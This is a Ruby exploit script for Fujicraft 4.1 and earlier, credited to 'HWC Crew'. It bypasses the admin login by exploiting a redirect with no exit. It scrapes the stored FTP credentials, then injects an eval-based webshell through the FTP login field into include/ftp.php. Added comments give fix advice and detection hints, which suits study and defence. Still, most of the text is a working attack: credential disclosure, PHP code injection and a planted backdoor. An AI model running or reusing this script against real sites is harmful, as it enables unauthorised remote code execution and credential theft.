Fujicraft <= 4.1 Remote Php Execution

#!/usr/bin/ruby

require 'net/http'

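# Description:
# The admin area sends a redirect with header() but does not call exit,
# so the PHP code below the header() call is still executed.
# Every function of the admin area is therefore reachable without logging in.
# The most interesting one: changing the FTP settings,
# which writes to a file with no checks at all,
# PHP code included.
#
# Reviewer note (fix): stop execution right after the redirect header()
# (exit/die) and escape or validate the FTP values before they are written
# to the settings file.
#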


# Proof-of-concept flow: read the FTP settings form of the admin page, then
# post the same settings back with extra PHP appended to the login field.
# No cookie, session or credential is sent anywhere in this script, so every
# request below is an unauthenticated one.

# Target host and base path of the installation under test; the defaults
# point at a local test copy.
site = "localhost"
path = "/pentest/fujicraft/fujicraft/"
# PHP statement that the POST below tries to get written into the
# server-side settings file.
payload = "echo eval($_GET['c']);" # PHP payload

# Banner.
puts "        #######################"
puts "        #       HWC Crew      #"
puts "        #######################"
puts "            - hwc-crew.com\n\n"


# Plain HTTP on port 80.
http = Net::HTTP.new(site, 80)


# Step 1: request the admin FTP settings page.
puts "[+] - Getting infos... "
resp, page1 = http.get(path+"admin.php?page=ftp")

# Pull the currently stored FTP login, password, host, path and selected port
# out of the returned HTML form. That these values can be scraped at all means
# the page discloses the stored FTP credentials to this request.
username = page1.scan(/id="ftpLogin" value="(.+?)" \/>/)
password = page1.scan(/id="ftpPassword" value="(.+?)" \/>/)
hote     = page1.scan(/ id="ftpHost" value="(.+?)" \/>/)
ftp_path = page1.scan(/id="ftpPath" value="(.+?)" \/>/)
port     = page1.scan(/value="([0-9]+)" checked="true" \/>/)

# Form body that re-submits the scraped settings. The ftp_login field carries
# the login followed by "');", the payload and "//".
# NOTE(review): this shape suggests the application copies ftp_login into a
# quoted string inside a generated PHP file without escaping it - inferred
# from the request and the header comment, not visible here; confirm against
# the application source. Mitigation on the application side: store the
# settings as data rather than PHP source, or escape them before writing.
data = "server_path=2&ftp_login=#{username}'); #{payload}//&ftp_password=#{password}&ftp_host=#{hote}&ftp_path=#{ftp_path}&ftp_port=#{port}&submit=Submit+Query"

# Step 2: post the form to the same admin page.
puts "[+] - Injecting payload... "
resp, page2 = http.post(path+"admin.php?page=ftp", data, "")

# Success is judged only by the French confirmation text in the response body.
# Detection hint for defenders: POST requests to admin.php?page=ftp that carry
# no authenticated session, and unexpected changes to include/ftp.php (the
# file named in the message below).
if page2.match(/FTP ont bien/)

        puts "[+] - Payload successfuly injected ! \n"
        puts "[+] - View result on : #{site}#{path}include/ftp.php"
else
        
        puts "[-] - Error during injection. Verify the given informations."

end
 

Groucho

